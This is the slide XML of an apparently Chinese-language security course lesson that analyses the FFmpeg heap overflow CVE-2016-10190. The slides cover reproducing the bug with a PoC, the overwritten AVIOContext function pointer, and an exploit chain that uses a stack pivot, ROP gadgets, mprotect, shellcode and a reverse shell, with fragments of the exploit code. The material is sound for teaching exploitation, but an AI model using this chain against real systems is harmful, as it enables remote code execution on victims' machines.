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5" r:id="rId3"/>
    <p:sldId id="261" r:id="rId4"/>
    <p:sldId id="270" r:id="rId5"/>
    <p:sldId id="271" r:id="rId6"/>
    <p:sldId id="272" r:id="rId7"/>
    <p:sldId id="273" r:id="rId8"/>
    <p:sldId id="290" r:id="rId9"/>
    <p:sldId id="291" r:id="rId10"/>
    <p:sldId id="293" r:id="rId11"/>
    <p:sldId id="294" r:id="rId12"/>
    <p:sldId id="295" r:id="rId13"/>
    <p:sldId id="296" r:id="rId14"/>
    <p:sldId id="299" r:id="rId15"/>
    <p:sldId id="300" r:id="rId16"/>
    <p:sldId id="301" r:id="rId17"/>
    <p:sldId id="302" r:id="rId18"/>
    <p:sldId id="303" r:id="rId19"/>
    <p:sldId id="30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240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211710"/>
            <a:ext cx="3637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800" dirty="0" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> CVE-2016-10190</a:t>
            </a:r>
          </a:p>
          <a:p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FFmpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" spc="800" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>堆溢出漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" spc="800" dirty="0" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" spc="800" dirty="0">
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" spc="8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链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栈迁移，把栈迁移到可控的堆上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 构造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链，调用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mprotect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函数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mprotect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()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函数把自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start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开始的、长度为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len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的内存区的保护属性修改为可执行值。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目拷贝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shellcode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到目标内存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 跳到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shellcode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执行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2083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ROPgadget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ROPgadget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--binary ./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ffmpeg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 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寻找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片段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17003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栈迁移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操作首先要把栈迁移到堆上，由于堆地址是随机的，我们不知道。所以只能利用当时寄存器或者内存中存在的堆指针，并且堆指针要指向我们可控的区域。在寄存器中没有找到合适的值，但是打印当前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stack,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可以看到栈上正好有我们需要的堆指针，指向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AVIOContext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结构体的开头。接下来只要想办法找到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pop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rsp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; ret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之类的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就可以了。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把栈迁移之后，先利用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add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rsp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, 0x58; ret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这种蹦床把栈拔高，然后执行我们真正的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ROP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指令。由于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plt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表中有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mprotect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所以可以先将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0x400000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地址处的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page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权限改为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rwx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，再把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shellcode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写到那边去，然后跳转过去就行了。最终的堆布局如下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9676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652120" y="1347615"/>
            <a:ext cx="303468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栈迁移到可控的堆上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执行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rop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Picture 2" descr="E:\pediy\我的课程\第四节FFmpeg堆溢出漏洞分析\Screenshot from 2020-08-29 01-51-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1590"/>
            <a:ext cx="4250105" cy="32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140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protect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(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可写权限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.data .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bss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pop_rdi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shellcode_location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pop_rsi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p64(0x1000)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+= p64(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pop_rdx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p64(7)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plt_mprotect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30831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write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将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shellcode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写道目标区域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for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shell in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shellslices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pop_rax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write_location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pop_rdx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shell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mov_gadget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write_location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+= 8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55362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跳到目标区域执行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shellcode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+= p64(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shellcode_location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) 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96638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</a:t>
            </a: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反弹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shell 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2" name="Picture 2" descr="E:\pediy\我的课程\第四节FFmpeg堆溢出漏洞分析\Screenshot from 2020-08-29 03-32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24760"/>
            <a:ext cx="5168627" cy="174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502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利用总结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2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="26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9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700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700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、堆溢出覆盖函数指针</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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7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700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不同之前，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0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zh-CN" altLang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，绕过了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>aslr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700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700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等保护机制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="29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29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29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8533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如何发现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771551"/>
            <a:ext cx="8147248" cy="3528392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漏洞位置  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</a:rPr>
              <a:t>recv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函数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  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漏洞原因  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size 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太大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漏洞利用  堆溢出覆盖了函数指针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随缘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重点对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:b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4171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漏洞复现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漏洞分析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漏洞利用</a:t>
            </a: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软件介绍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FFmpeg</a:t>
            </a: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FFmpeg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是一套可以用来记录、转换数字音频、视频，并能将其转化为流的开源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计算机程序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。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2016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年末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paulcher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发现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FFmpeg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三个堆溢出漏洞分别为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CVE-2016-10190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CVE-2016-10191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以及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CVE-2016-10192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 其中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CVE-2016-10190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比较经典，堆溢出造成了远程代码执行。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目录环境搭建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操作系统：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ubuntu18.04(64bit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目标软件版本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ffmpeg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3.2.1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编译安装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下载目标软件源码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https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://github.com/FFmpeg/FFmpeg/archive/n3.2.1.tar.gz</a:t>
            </a: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安装依赖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sudo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apt-get -y install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autoconf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automake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build-essential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libass-dev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libfreetype6-dev libsdl2-dev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libtheora-dev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libtool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libva-dev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libvdpau-dev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libvorbis-dev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libxcb1-dev libxcb-shm0-dev libxcb-xfixes0-dev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pkg-config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texinfo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wget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zlib1g-dev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yasm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编译安装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./configure --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disable-stripping(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开启调试符号信息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ake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m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ake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run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漏洞复现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2000" b="1" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行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+mn-ea"/>
              </a:rPr>
              <a:t>poc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1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exp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地址 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https://gist.github.com/PaulCher/324690b88db8c4cf844e056289d4a1d6#file-exploit_ffmpeg-py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python poc.py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./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ffmpeg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-i http://127.0.0.1:12345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652120" y="1347615"/>
            <a:ext cx="303468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AVIOContext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结构体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函数指针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s-&gt;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read_packet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Picture 2" descr="E:\pediy\我的课程\第四节FFmpeg堆溢出漏洞分析\Screenshot from 2020-08-29 01-07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7614"/>
            <a:ext cx="5077817" cy="30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652120" y="1347615"/>
            <a:ext cx="303468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s-&gt;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eof_reached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为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0</a:t>
            </a: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绕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过限制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调用函数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s-&gt;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read_packet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 descr="E:\pediy\我的课程\第四节FFmpeg堆溢出漏洞分析\Screenshot from 2020-08-29 01-10-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65385"/>
            <a:ext cx="3989561" cy="333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387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ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞利用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652120" y="1347615"/>
            <a:ext cx="303468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溢出覆盖函数指针，控制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EIP</a:t>
            </a:r>
          </a:p>
          <a:p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下一步构造利用链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之前没有绕过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ASLR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，用的已知的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system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地址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现在绕过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ASLR,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用程序已知的信息，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</a:rPr>
              <a:t>rop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链。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74" name="Picture 2" descr="E:\pediy\我的课程\第四节FFmpeg堆溢出漏洞分析\Screenshot from 2020-08-29 01-12-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43558"/>
            <a:ext cx="4388666" cy="340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625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>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </a:ln>
      </a:spPr>
      <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
        <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr marL="0" marR="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
          <a:lnSpc>
            <a:spcPct val="170000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPct val="20000"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPts val="0"/>
          </a:spcAft>
          <a:buClrTx/>
          <a:buSzTx/>
          <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
          <a:buNone/>
          <a:defRPr kumimoji="0" sz="18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n-ea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641</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(16:9)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307</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-14T13:14:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-04T09:24:15Z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